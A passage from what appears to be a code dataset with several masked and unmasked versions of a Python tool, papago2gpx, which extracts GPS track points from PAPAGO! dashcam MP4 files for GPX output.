local_time.strftime('%Y%m%d%H%M%S')\n\n def format_as_csv(self) ->str:\n if self._time is not None:\n local_time = self._time.as_local_time()\n result = local_time.strftime('%Y/%m/%d %H:%M:%S')\n else:\n result = ''\n status = self._status if self._status is not None else ''\n result += f',{status}'\n latitude = str(self._latitude) if self._latitude is not None else ''\n result += f',{latitude}'\n longitude = str(self._longitude) if self._longitude is not None else ''\n result += f',{longitude}'\n result += f',{self._speed}'\n result += f',{self._azimuth}'\n result += f',{self._x_acceleration}'\n result += f',{self._y_acceleration}'\n result += f',{self._z_acceleration}'\n return result\n\n def __repr__(self) ->str:\n latitude = str(self._latitude) if self._latitude is not None else ''\n longitude = str(self._longitude) if self._longitude is not None else ''\n return f'{self._time},{latitude},{longitude}'\n\n def __lt__(self, other) ->bool:\n return self._time < other._time\n\n def __eq__(self, other) ->bool:\n return (self._time == other._time and self._latitude == other.\n _latitude and self._longitude == other._longitude)\n\n\nclass TrackSegment(object):\n\n def __init__(self):\n self._track_points = []\n\n def append_track_point(self, track_point: TrackPoint) ->None:\n self._track_points.append(track_point)\n\n def __len__(self) ->int:\n return len(self._track_points)\n\n def __iter__(self) ->Iterable[TrackPoint]:\n return iter(self._track_points)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Arguments(object):\n\n def __init__(self):\n parser = argparse.ArgumentParser(prog='papago2gpx', description=\n 'Extract GPS data from MP4 video files created by PAPAGO! dashcams, and format them into a GPX file.'\n )\n parser.add_argument('input_paths', nargs='+', help=\n 'The path to an input file or directory.', metavar='INPUT_PATH')\n parser.add_argument('--name', help=\n 'The name of the GPX file to output. Default to 16 deciaml digits representing the first GPS record time.'\n , metavar='NAME')\n parser.add_argument('--description', help=\n 'The description of the GPX file to output.', metavar='DESCRIPTION'\n )\n parser.add_argument('--author-name', help=\n 'The name of the author of the GPX file to output.', metavar=\n 'AUTHOR_NAME')\n parser.add_argument('--author-email', help=\n 'The Email address of the author of the GPX file to output.',\n metavar='AUTHOR_EMAIL')\n parser.add_argument('--copyright', help=\n \"The copyright holder of the GPX file to output. Default to `AUTHOR_NAME'.\"\n , metavar='COPYRIGHT')\n parser.add_argument('--copyright-year', help=\n 'The copyright year of the GPX file to output. Default to the year the file is created.'\n , metavar='COPYRIGHT_YEAR')\n parser.add_argument('--copyright-license', help=\n 'A link to an external file containing license text.', metavar=\n 'LICENSE')\n parser.add_argument('--keywords', help=\n 'Keywords associated with the GPX file to output.', metavar=\n 'KEYWORDS')\n parser.add_argument('--track-name', help='The name of the track.',\n metavar='TRACK_NAME')\n parser.add_argument('--track-comment', help=\n 'The comment of the track.', metavar='TRACK_COMMENT')\n parser.add_argument('--track-description', help=\n 'The description of the track.', metavar='TRACK_DESCRIPTION')\n parser.add_argument('--track-type', default=_DEFAULT_TRACK_TYPE,\n help=f\"The type of the track. Default to `{_DEFAULT_TRACK_TYPE}'.\")\n parser.add_argument('--uniq', choices=['first', 'last'], help=\n 'How to process different coordinates recorded at the same timestamp. Default to an error.'\n )\n parser.add_argument('--overwrite', action='store_true', help=\n 'Allow to overwrite an existing file.')\n args = parser.parse_args()\n self._input_paths = []\n for input_path in args.input_paths:\n input_path = pathlib.Path(input_path)\n if not input_path.exists():\n print(f'{input_path}: File does not exist.', file=sys.stderr)\n sys.exit(1)\n self._input_paths.append(input_path)\n self._name = args.name\n self._description = args.description\n self._author_name = args.author_name\n self._author_email = args.author_email\n self._copyright = args.copyright\n if self._copyright is None and self._author_name is not None:\n self._copyright = self._author_name\n self._copyright_year = args.copyright_year\n if self._copyright_year is not None and self._copyright is None:\n print(\"`--copyright-year' is specified, but `--copyright' is not.\",\n file=sys.stderr)\n sys.exit(1)\n if self._copyright_year is None and self._copyright is not None:\n utc_now = datetime.datetime.now(datetime.timezone.utc)\n local_aware_now = utc_now.astimezone()\n self._copyright_year = local_aware_now.year\n self._copyright_license = args.copyright_license\n if self._copyright_license is not None and self._copyright is None:\n print(\n \"`--copyright-license' is specified, but `--copyright' is not.\"\n , file=sys.stderr)\n sys.exit(1)\n self._keywords = args.keywords\n self._track_name = args.track_name\n self._track_comment = args.track_comment\n self._track_description = args.track_description\n self._track_type = args.track_type\n if self._track_type is None:\n self._track_type = _DEFAULT_TRACK_TYPE\n if self._track_type == '':\n self._track_type = None\n self._how_to_unique = args.uniq\n self._overwrite = args.overwrite\n\n @property\n def input_paths(self) ->List[pathlib.Path]:\n return self._input_paths\n <mask token>\n\n @property\n def description(self) ->Optional[str]:\n return self._description\n\n @property\n def author_name(self) ->Optional[str]:\n return self._author_name\n\n @property\n def author_email(self) ->Optional[str]:\n return self._author_email\n\n @property\n def copyright(self) ->Optional[str]:\n return self._copyright\n\n @property\n def copyright_year(self) ->Optional[int]:\n return self._copyright_year\n\n @property\n def copyright_license(self) ->Optional[str]:\n return self._copyright_license\n\n @property\n def keywords(self) ->Optional[str]:\n return self._keywords\n\n @property\n def track_name(self) ->Optional[str]:\n return self._track_name\n\n @property\n def track_comment(self) ->Optional[str]:\n return self._track_comment\n\n @property\n def track_description(self) ->Optional[str]:\n return self._track_description\n <mask token>\n <mask token>\n <mask token>\n\n\nclass BrokenMp4FileError(RuntimeError):\n\n def __init__(self, message: str):\n super().__init__(message)\n\n\nclass GpsDataError(RuntimeError):\n\n def __init__(self, message: str):\n super().__init__(message)\n\n\nclass GpsDataBlockIndex(object):\n\n def __init__(self, position: int, size: int):\n if position <= 0:\n raise ValueError(f\"An invalid position: `{position}'.\")\n if size <= 0:\n raise ValueError(f\"An invalid size: `{size}'.\")\n self._position = position\n self._size = size\n\n @property\n def position(self) ->int:\n return self._position\n\n @property\n def size(self) ->int:\n return self._size\n\n\n<mask token>\n\n\nclass Time(object):\n\n def __init__(self, time: datetime.datetime):\n if time.tzinfo is None:\n raise ValueError(\n \"Expect an aware `datetime' object, but got naive one.\")\n self._time = time.astimezone(datetime.timezone.utc)\n\n def as_local_time(self) ->datetime.datetime:\n return self._time.astimezone()\n\n def __repr__(self) ->str:\n result = self._time.strftime('%Y-%m-%dT%H:%M:%S%z')\n return re.sub('(\\\\+\\\\d{2})(\\\\d{2})$', '\\\\1:\\\\2', result)\n\n def __lt__(self, other) ->bool:\n return self._time < other._time\n\n def __eq__(self, other) ->bool:\n return self._time == other._time\n\n\nclass Latitude(object):\n\n def __init__(self, degree: float):\n if degree < -90 or 90 < degree:\n raise ValueError(\"An invalid latitude degree: `{degree}'.\")\n self._degree = degree\n\n def __repr__(self) ->str:\n return format(self._degree, '.6F')\n\n def __lt__(self, other) ->bool:\n return self._degree < other._degree\n\n def __eq__(self, other) ->bool:\n return self._degree == other._degree\n\n\nclass Longitude(object):\n\n def __init__(self, degree: float):\n if degree < -180 or 180 < degree:\n raise ValueError(\"An invalid longitude degree: `{degree}'.\")\n self._degree = degree\n\n def __repr__(self) ->str:\n return format(self._degree, '.6F')\n\n def __lt__(self, other) ->bool:\n return self._degree < other._degree\n\n def __eq__(self, other) ->bool:\n return self._degree == other._degree\n\n\nclass Speed(object):\n\n def __init__(self, meter_per_second: float):\n self._meter_per_second = meter_per_second\n\n def __repr__(self) ->str:\n return format(self._meter_per_second, '.2F')\n\n\nclass Azimuth(object):\n\n def __init__(self, degree: float):\n if degree < 0 or 360 <= degree:\n raise ValueError(f\"An invalid azimuth degree: `{degree}'.\")\n self._degree = degree\n\n def __repr__(self) ->str:\n return format(self._degree, '.2F')\n\n\nclass TrackPoint(object):\n\n def __init__(self, time: Time, status: str, latitude: Optional[Latitude\n ], longitude: Optional[Longitude], speed: Speed, azimuth: Azimuth,\n x_acceleration: int, y_acceleration: int, z_acceleration: int):\n if (status == 'V' or status is None) != (latitude is None):\n raise ValueError(\n f'Inconsistent arguments: status = {status}, latitude = {latitude}'\n )\n if (status == 'V' or status is None) != (longitude is None):\n raise ValueError(\n f'Inconsistent arguments: status = {status}, longitude = {longitude}'\n )\n self._time = time\n self._status = status\n self._latitude = latitude\n self._longitude = longitude\n self._speed = speed\n self._azimuth = azimuth\n self._x_acceleration = x_acceleration\n self._y_acceleration = y_acceleration\n self._z_acceleration = z_acceleration\n\n @property\n def time(self) ->Time:\n return self._time\n\n @property\n def status(self) ->str:\n return self._status\n\n @property\n def latitude(self) ->Optional[Latitude]:\n return self._latitude\n\n @property\n def longitude(self) ->Optional[Longitude]:\n return self._longitude\n\n @property\n def speed(self) ->Speed:\n return self._speed\n\n @property\n def azimuth(self) ->Azimuth:\n return self._azimuth\n\n @property\n def x_acceleration(self) ->int:\n return self._x_acceleration\n\n @property\n def y_acceleration(self) ->int:\n return self._y_acceleration\n\n @property\n def z_acceleration(self) ->int:\n return self._z_acceleration\n\n @property\n def name(self) ->str:\n local_time = self._time.as_local_time()\n return local_time.strftime('%Y%m%d%H%M%S')\n\n def format_as_csv(self) ->str:\n if self._time is not None:\n local_time = self._time.as_local_time()\n result = local_time.strftime('%Y/%m/%d %H:%M:%S')\n else:\n result = ''\n status = self._status if self._status is not None else ''\n result += f',{status}'\n latitude = str(self._latitude) if self._latitude is not None else ''\n result += f',{latitude}'\n longitude = str(self._longitude) if self._longitude is not None else ''\n result += f',{longitude}'\n result += f',{self._speed}'\n result += f',{self._azimuth}'\n result += f',{self._x_acceleration}'\n result += f',{self._y_acceleration}'\n result += f',{self._z_acceleration}'\n return result\n\n def __repr__(self) ->str:\n latitude = str(self._latitude) if self._latitude is not None else ''\n longitude = str(self._longitude) if self._longitude is not None else ''\n return f'{self._time},{latitude},{longitude}'\n\n def __lt__(self, other) ->bool:\n return self._time < other._time\n\n def __eq__(self, other) ->bool:\n return (self._time == other._time and self._latitude == other.\n _latitude and self._longitude == other._longitude)\n\n\nclass TrackSegment(object):\n\n def __init__(self):\n self._track_points = []\n\n def append_track_point(self, track_point: TrackPoint) ->None:\n self._track_points.append(track_point)\n\n def __len__(self) ->int:\n return len(self._track_points)\n\n def __iter__(self) ->Iterable[TrackPoint]:\n return iter(self._track_points)\n\n\n<mask token>\n",
"step-4": "import re\nimport datetime\nimport math\nimport pathlib\nimport os\nimport io\nimport argparse\nimport subprocess\nimport xml.sax.saxutils\nfrom typing import Optional, List, Iterable\nimport sys\n_DEFAULT_TRACK_TYPE = 'Dashcam track'\n\n\nclass Arguments(object):\n\n def __init__(self):\n parser = argparse.ArgumentParser(prog='papago2gpx', description=\n 'Extract GPS data from MP4 video files created by PAPAGO! dashcams, and format them into a GPX file.'\n )\n parser.add_argument('input_paths', nargs='+', help=\n 'The path to an input file or directory.', metavar='INPUT_PATH')\n parser.add_argument('--name', help=\n 'The name of the GPX file to output. Default to 16 deciaml digits representing the first GPS record time.'\n , metavar='NAME')\n parser.add_argument('--description', help=\n 'The description of the GPX file to output.', metavar='DESCRIPTION'\n )\n parser.add_argument('--author-name', help=\n 'The name of the author of the GPX file to output.', metavar=\n 'AUTHOR_NAME')\n parser.add_argument('--author-email', help=\n 'The Email address of the author of the GPX file to output.',\n metavar='AUTHOR_EMAIL')\n parser.add_argument('--copyright', help=\n \"The copyright holder of the GPX file to output. Default to `AUTHOR_NAME'.\"\n , metavar='COPYRIGHT')\n parser.add_argument('--copyright-year', help=\n 'The copyright year of the GPX file to output. Default to the year the file is created.'\n , metavar='COPYRIGHT_YEAR')\n parser.add_argument('--copyright-license', help=\n 'A link to an external file containing license text.', metavar=\n 'LICENSE')\n parser.add_argument('--keywords', help=\n 'Keywords associated with the GPX file to output.', metavar=\n 'KEYWORDS')\n parser.add_argument('--track-name', help='The name of the track.',\n metavar='TRACK_NAME')\n parser.add_argument('--track-comment', help=\n 'The comment of the track.', metavar='TRACK_COMMENT')\n parser.add_argument('--track-description', help=\n 'The description of the track.', metavar='TRACK_DESCRIPTION')\n parser.add_argument('--track-type', default=_DEFAULT_TRACK_TYPE,\n help=f\"The type of the track. Default to `{_DEFAULT_TRACK_TYPE}'.\")\n parser.add_argument('--uniq', choices=['first', 'last'], help=\n 'How to process different coordinates recorded at the same timestamp. Default to an error.'\n )\n parser.add_argument('--overwrite', action='store_true', help=\n 'Allow to overwrite an existing file.')\n args = parser.parse_args()\n self._input_paths = []\n for input_path in args.input_paths:\n input_path = pathlib.Path(input_path)\n if not input_path.exists():\n print(f'{input_path}: File does not exist.', file=sys.stderr)\n sys.exit(1)\n self._input_paths.append(input_path)\n self._name = args.name\n self._description = args.description\n self._author_name = args.author_name\n self._author_email = args.author_email\n self._copyright = args.copyright\n if self._copyright is None and self._author_name is not None:\n self._copyright = self._author_name\n self._copyright_year = args.copyright_year\n if self._copyright_year is not None and self._copyright is None:\n print(\"`--copyright-year' is specified, but `--copyright' is not.\",\n file=sys.stderr)\n sys.exit(1)\n if self._copyright_year is None and self._copyright is not None:\n utc_now = datetime.datetime.now(datetime.timezone.utc)\n local_aware_now = utc_now.astimezone()\n self._copyright_year = local_aware_now.year\n self._copyright_license = args.copyright_license\n if self._copyright_license is not None and self._copyright is None:\n print(\n \"`--copyright-license' is specified, but `--copyright' is not.\"\n , file=sys.stderr)\n sys.exit(1)\n self._keywords = args.keywords\n self._track_name = args.track_name\n self._track_comment = args.track_comment\n self._track_description = args.track_description\n self._track_type = args.track_type\n if self._track_type is None:\n self._track_type = _DEFAULT_TRACK_TYPE\n if self._track_type == '':\n self._track_type = None\n self._how_to_unique = args.uniq\n self._overwrite = args.overwrite\n\n @property\n def input_paths(self) ->List[pathlib.Path]:\n return self._input_paths\n\n @property\n def name(self) ->Optional[str]:\n return self._name\n\n @property\n def description(self) ->Optional[str]:\n return self._description\n\n @property\n def author_name(self) ->Optional[str]:\n return self._author_name\n\n @property\n def author_email(self) ->Optional[str]:\n return self._author_email\n\n @property\n def copyright(self) ->Optional[str]:\n return self._copyright\n\n @property\n def copyright_year(self) ->Optional[int]:\n return self._copyright_year\n\n @property\n def copyright_license(self) ->Optional[str]:\n return self._copyright_license\n\n @property\n def keywords(self) ->Optional[str]:\n return self._keywords\n\n @property\n def track_name(self) ->Optional[str]:\n return self._track_name\n\n @property\n def track_comment(self) ->Optional[str]:\n return self._track_comment\n\n @property\n def track_description(self) ->Optional[str]:\n return self._track_description\n\n @property\n def track_type(self) ->Optional[str]:\n return self._track_type\n\n @property\n def how_to_unique(self) ->str:\n return self._how_to_unique\n\n @property\n def overwrite(self) ->bool:\n return self._overwrite\n\n\nclass BrokenMp4FileError(RuntimeError):\n\n def __init__(self, message: str):\n super().__init__(message)\n\n\nclass GpsDataError(RuntimeError):\n\n def __init__(self, message: str):\n super().__init__(message)\n\n\nclass GpsDataBlockIndex(object):\n\n def __init__(self, position: int, size: int):\n if position <= 0:\n raise ValueError(f\"An invalid position: `{position}'.\")\n if size <= 0:\n raise ValueError(f\"An invalid size: `{size}'.\")\n self._position = position\n self._size = size\n\n @property\n def position(self) ->int:\n return self._position\n\n @property\n def size(self) ->int:\n return self._size\n\n\ndef get_gps_data_block_indices(mp4_file: io.FileIO) ->List[GpsDataBlockIndex]:\n target_box_path = ['moov', 'gps ']\n while True:\n box_size = mp4_file.read(4)\n if len(box_size) == 0:\n raise GpsDataError(\n f'{mp4_file.name}: Could not find any GPS data block index.')\n if len(box_size) < 4:\n error_position = format(mp4_file.tell() - len(box_size), '#010x')\n raise BrokenMp4FileError(\n f'{mp4_file.name}:{error_position}: Expect the size of a box, but got EOF.'\n )\n box_size = int.from_bytes(box_size, 'big')\n box_type = mp4_file.read(4)\n if len(box_type) < 4:\n error_position = format(mp4_file.tell() - len(box_type), '#010x')\n raise BrokenMp4FileError(\n f'{mp4_file.name}:{error_position}: Expect the type of a box, but got EOF.'\n )\n box_type = box_type.decode('UTF-8')\n if box_size == 0:\n box_size = None\n next_position = None\n elif box_size == 1:\n box_size = mp4_file.read(8)\n if len(box_size) < 8:\n error_position = format(mp4_file.tell() - len(box_size),\n '#010x')\n raise BrokenMp4FileError(\n f'{mp4_file.name}:{error_position}: Expect the size of a box, but got EOF.'\n )\n box_size = int.from_bytes(box_size, 'big')\n next_position = mp4_file.tell() + box_size - 16\n else:\n next_position = mp4_file.tell() + box_size - 8\n if box_type == target_box_path[0]:\n target_box_path.pop(0)\n if len(target_box_path) == 0:\n break\n else:\n if next_position is None:\n raise GpsDataError(\n f'{mp4_file.name}: Could not find any GPS data block index.'\n )\n mp4_file.seek(next_position)\n if mp4_file.tell() != next_position:\n raise BrokenMp4FileError(\n f'{mp4_file.name}: The size of a box is not equal to the actual one.'\n )\n unknown = mp4_file.read(4)\n if len(unknown) < 4:\n error_position = format(mp4_file.tell() - len(unknown), '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect a big-endian 32-bit unsigned integer, but got EOF.'\n )\n unknown = int.from_bytes(unknown, 'big')\n if unknown != 257:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect a big-endian 32-bit unsigned integer with value `257', but got `{unknown}'.\"\n )\n gps_data_block_count = mp4_file.read(4)\n if len(gps_data_block_count) < 4:\n error_position = format(mp4_file.tell() - len(gps_data_block_count),\n '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect a big-endian 32-bit unsigned integer, but got EOF.'\n )\n gps_data_block_count = int.from_bytes(gps_data_block_count, 'big')\n gps_data_block_indices = []\n for i in range(gps_data_block_count):\n position = mp4_file.read(4)\n if len(position) < 4:\n error_position = format(mp4_file.tell() - len(position), '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect the position of a GPS data block, but got EOF.'\n )\n position = int.from_bytes(position, 'big')\n if position < 0:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect the position of a GPS data block, but got an invalid value `{position}'.\"\n )\n size = mp4_file.read(4)\n if len(size) < 4:\n error_position = format(mp4_file.tell() - len(size), '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect the size of a GPS data block, but got EOF.'\n )\n size = int.from_bytes(size, 'big')\n if size < 0:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect the size of a GPS data block, but got an invalid value `{size}'.\"\n )\n if position == 0 or size == 0:\n print(\n f'{mp4_file.name}: Warning: The index of GPS data blocks is not recorded.'\n , file=sys.stderr)\n else:\n gps_data_block_index = GpsDataBlockIndex(position, size)\n gps_data_block_indices.append(gps_data_block_index)\n if mp4_file.tell() != next_position:\n error_position = format(mp4_file.tell(), '#010x')\n raise GpsDataError(\n f'{mp4_file_path}:{error_position}: Expect EOF, but find additional data.'\n )\n return gps_data_block_indices\n\n\ndef read_little_endian_single(mp4_file: io.FileIO) ->float:\n data = mp4_file.read(4)\n if len(data) < 4:\n error_position = format(mp4_file.tell() - len(data), '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect a little-endian single-precision floating point number, but got EOF.'\n )\n data = int.from_bytes(data, 'little')\n sign = (data & 2147483648) >> 31\n exponent = ((data & 2139095040) >> 23) - 127\n mantissa = data & 8388607 | 8388608\n sign = '+' if sign == 0 else '-'\n exponent = str(exponent - 23)\n mantissa_hex = format(mantissa, '08x')\n return float.fromhex(f'{sign}0x{mantissa_hex}p{exponent}')\n\n\nclass Time(object):\n\n def __init__(self, time: datetime.datetime):\n if time.tzinfo is None:\n raise ValueError(\n \"Expect an aware `datetime' object, but got naive one.\")\n self._time = time.astimezone(datetime.timezone.utc)\n\n def as_local_time(self) ->datetime.datetime:\n return self._time.astimezone()\n\n def __repr__(self) ->str:\n result = self._time.strftime('%Y-%m-%dT%H:%M:%S%z')\n return re.sub('(\\\\+\\\\d{2})(\\\\d{2})$', '\\\\1:\\\\2', result)\n\n def __lt__(self, other) ->bool:\n return self._time < other._time\n\n def __eq__(self, other) ->bool:\n return self._time == other._time\n\n\nclass Latitude(object):\n\n def __init__(self, degree: float):\n if degree < -90 or 90 < degree:\n raise ValueError(\"An invalid latitude degree: `{degree}'.\")\n self._degree = degree\n\n def __repr__(self) ->str:\n return format(self._degree, '.6F')\n\n def __lt__(self, other) ->bool:\n return self._degree < other._degree\n\n def __eq__(self, other) ->bool:\n return self._degree == other._degree\n\n\nclass Longitude(object):\n\n def __init__(self, degree: float):\n if degree < -180 or 180 < degree:\n raise ValueError(\"An invalid longitude degree: `{degree}'.\")\n self._degree = degree\n\n def __repr__(self) ->str:\n return format(self._degree, '.6F')\n\n def __lt__(self, other) ->bool:\n return self._degree < other._degree\n\n def __eq__(self, other) ->bool:\n return self._degree == other._degree\n\n\nclass Speed(object):\n\n def __init__(self, meter_per_second: float):\n self._meter_per_second = meter_per_second\n\n def __repr__(self) ->str:\n return format(self._meter_per_second, '.2F')\n\n\nclass Azimuth(object):\n\n def __init__(self, degree: float):\n if degree < 0 or 360 <= degree:\n raise ValueError(f\"An invalid azimuth degree: `{degree}'.\")\n self._degree = degree\n\n def __repr__(self) ->str:\n return format(self._degree, '.2F')\n\n\nclass TrackPoint(object):\n\n def __init__(self, time: Time, status: str, latitude: Optional[Latitude\n ], longitude: Optional[Longitude], speed: Speed, azimuth: Azimuth,\n x_acceleration: int, y_acceleration: int, z_acceleration: int):\n if (status == 'V' or status is None) != (latitude is None):\n raise ValueError(\n f'Inconsistent arguments: status = {status}, latitude = {latitude}'\n )\n if (status == 'V' or status is None) != (longitude is None):\n raise ValueError(\n f'Inconsistent arguments: status = {status}, longitude = {longitude}'\n )\n self._time = time\n self._status = status\n self._latitude = latitude\n self._longitude = longitude\n self._speed = speed\n self._azimuth = azimuth\n self._x_acceleration = x_acceleration\n self._y_acceleration = y_acceleration\n self._z_acceleration = z_acceleration\n\n @property\n def time(self) ->Time:\n return self._time\n\n @property\n def status(self) ->str:\n return self._status\n\n @property\n def latitude(self) ->Optional[Latitude]:\n return self._latitude\n\n @property\n def longitude(self) ->Optional[Longitude]:\n return self._longitude\n\n @property\n def speed(self) ->Speed:\n return self._speed\n\n @property\n def azimuth(self) ->Azimuth:\n return self._azimuth\n\n @property\n def x_acceleration(self) ->int:\n return self._x_acceleration\n\n @property\n def y_acceleration(self) ->int:\n return self._y_acceleration\n\n @property\n def z_acceleration(self) ->int:\n return self._z_acceleration\n\n @property\n def name(self) ->str:\n local_time = self._time.as_local_time()\n return local_time.strftime('%Y%m%d%H%M%S')\n\n def format_as_csv(self) ->str:\n if self._time is not None:\n local_time = self._time.as_local_time()\n result = local_time.strftime('%Y/%m/%d %H:%M:%S')\n else:\n result = ''\n status = self._status if self._status is not None else ''\n result += f',{status}'\n latitude = str(self._latitude) if self._latitude is not None else ''\n result += f',{latitude}'\n longitude = str(self._longitude) if self._longitude is not None else ''\n result += f',{longitude}'\n result += f',{self._speed}'\n result += f',{self._azimuth}'\n result += f',{self._x_acceleration}'\n result += f',{self._y_acceleration}'\n result += f',{self._z_acceleration}'\n return result\n\n def __repr__(self) ->str:\n latitude = str(self._latitude) if self._latitude is not None else ''\n longitude = str(self._longitude) if self._longitude is not None else ''\n return f'{self._time},{latitude},{longitude}'\n\n def __lt__(self, other) ->bool:\n return self._time < other._time\n\n def __eq__(self, other) ->bool:\n return (self._time == other._time and self._latitude == other.\n _latitude and self._longitude == other._longitude)\n\n\nclass TrackSegment(object):\n\n def __init__(self):\n self._track_points = []\n\n def append_track_point(self, track_point: TrackPoint) ->None:\n self._track_points.append(track_point)\n\n def __len__(self) ->int:\n return len(self._track_points)\n\n def __iter__(self) ->Iterable[TrackPoint]:\n return iter(self._track_points)\n\n\n_UNKNOWN_BYTES = (\n b'\\x00!\\x17\\x00\\x00\\x00\\x00\\x00\\x80\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\xbc\\xc7\\x17\\x00\\x00\\x00\\x00\\x00\\x80\\x01\\x00\\x00\\x00\\x00\\x00\\x00<\\xdb\\x17\\x00\\x00\\x00\\x00\\x00\\x80\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\xb5\\x18\\x00\\x00\\x00\\x00\\x00\\x80\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\xa0\\xfe\\x19\\x00\\x00\\x00\\x00\\x00\\x80\\x01\\x00\\x00\\x00\\x00\\x00\\x00 \\xf9\\x1b\\x00\\x00\\x00\\x00\\x00\\x80\\x01\\x00\\x00\\x01\\x00\\x00\\x00\\xac\\xb3\\x1c\\x00\\x00\\x00\\x00\\x00\\x80\\x01\\x00\\x00\\x00\\x00\\x00\\x00'\n )\n\n\ndef parse_mp4_file(mp4_file_path: pathlib.Path) ->List[TrackPoint]:\n track_points = []\n with open(mp4_file_path, 'rb') as mp4_file:\n gps_data_block_indices = get_gps_data_block_indices(mp4_file)\n for gps_data_block_index in gps_data_block_indices:\n mp4_file.seek(gps_data_block_index.position)\n if mp4_file.tell() != gps_data_block_index.position:\n error_position = gps_data_block_index.position\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect a GPS data block, but got EOF.'\n )\n large_block_size = mp4_file.read(4)\n if len(large_block_size) < 4:\n error_position = format(mp4_file.tell() - len(\n large_block_size), '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect the size of a GPS data block, but got EOF.'\n )\n large_block_size = int.from_bytes(large_block_size, 'big')\n if large_block_size != gps_data_block_index.size:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(\n f'{mp4_file_path}:{error_position}: The size of a GPS data block is not equal to the one stored in the index.'\n )\n large_block_end = mp4_file.tell() - 4 + large_block_size\n signature = mp4_file.read(8)\n if len(signature) < 8:\n error_position = format(mp4_file.tell() - len(signature),\n '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect the signature of a GPS data block, but got EOF.'\n )\n signature = signature.decode('UTF-8')\n if signature != 'freeGPS ':\n error_position = format(mp4_file.tell() - 8, '#010x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect `freeGPS ' as the signature of a GPS data block, but got `{signature}'.\"\n )\n small_block_size = mp4_file.read(4)\n if len(small_block_size) < 4:\n error_position = format(mp4_file.tell() - len(\n small_block_size), '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect the size of a GPS data block, but got EOF.'\n )\n small_block_size = int.from_bytes(small_block_size, 'little')\n if small_block_size != 88:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect `88' as the size of a GPS data block, but got `{small_block_size}'.\"\n )\n small_block_end = mp4_file.tell() + small_block_size\n padding = mp4_file.read(32)\n if len(padding) < 32:\n error_position = format(mp4_file.tell() - len(padding), '#010x'\n )\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect zero padding, but got EOF.'\n )\n for j, b in enumerate(padding):\n if b != 0:\n error_position = format(mp4_file.tell() - 32 + j, '#010x')\n byte = format(b, '#04x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect zero padding, but got an invalid byte `{byte}'.\"\n )\n hour = mp4_file.read(4)\n if len(hour) < 4:\n error_position = format(mp4_file.tell() - len(hour), '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect the hour of time, but got EOF.'\n )\n hour = int.from_bytes(hour, 'little')\n if hour < 0 or 24 <= hour:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect the hour of time, but got an invalid value `{hour}'.\"\n )\n minute = mp4_file.read(4)\n if len(minute) < 4:\n error_position = format(mp4_file.tell() - len(minute), '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect the minute of time, but got EOF.'\n )\n minute = int.from_bytes(minute, 'little')\n if minute < 0 or 60 <= minute:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect the minute of time, but got an invalid value `{minute}'.\"\n )\n second = mp4_file.read(4)\n if len(second) < 4:\n error_position = format(mp4_file.tell() - len(second), '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect the second of time, but got EOF.'\n )\n second = int.from_bytes(second, 'little')\n if second < 0 or 60 <= second:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect the second of time, but got an invalid value `{second}'.\"\n )\n year = mp4_file.read(4)\n if len(year) < 4:\n error_position = format(mp4_file.tell() - len(year), '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect the year of time, but got EOF.'\n )\n year = int.from_bytes(year, 'little')\n if year == 0:\n error_position = format(mp4_file.tell() - 4, '#010x')\n if hour != 0:\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: `year == 0' but `hour != 0'.\"\n )\n if minute != 0:\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: `year == 0' but `minute != 0'.\"\n )\n if second != 0:\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: `year == 0' but `second != 0'.\"\n )\n else:\n year += 2000\n month = mp4_file.read(4)\n if len(month) < 4:\n error_position = format(mp4_file.tell() - len(month), '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect the month of time, but got EOF.'\n )\n month = int.from_bytes(month, 'little')\n if month == 0:\n if year != 0:\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: `year != 0' but `month == 0'.\"\n )\n assert hour == 0\n assert minute == 0\n assert second == 0\n elif month < 1 or 12 < month:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect the month of time, but got an invalid value `{month}'.\"\n )\n day = mp4_file.read(4)\n if len(day) < 4:\n error_position = format(mp4_file.tell() - len(day), '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect the day of time, but got EOF.'\n )\n day = int.from_bytes(day, 'little')\n if day == 